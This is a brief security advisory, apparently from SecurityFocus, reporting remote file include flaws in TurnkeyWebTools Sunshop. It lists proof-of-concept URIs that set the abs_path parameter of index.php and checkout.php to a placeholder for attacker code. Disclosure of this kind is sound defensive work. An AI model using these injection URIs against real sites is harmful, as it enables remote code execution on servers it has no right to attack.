TurnkeyWebTools Sunshop Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?abs_path=[evilcode]
http://www.example.com/checkout.php?abs_path=[evilcode]


 

Privacy Statement
Copyright 2010, SecurityFocus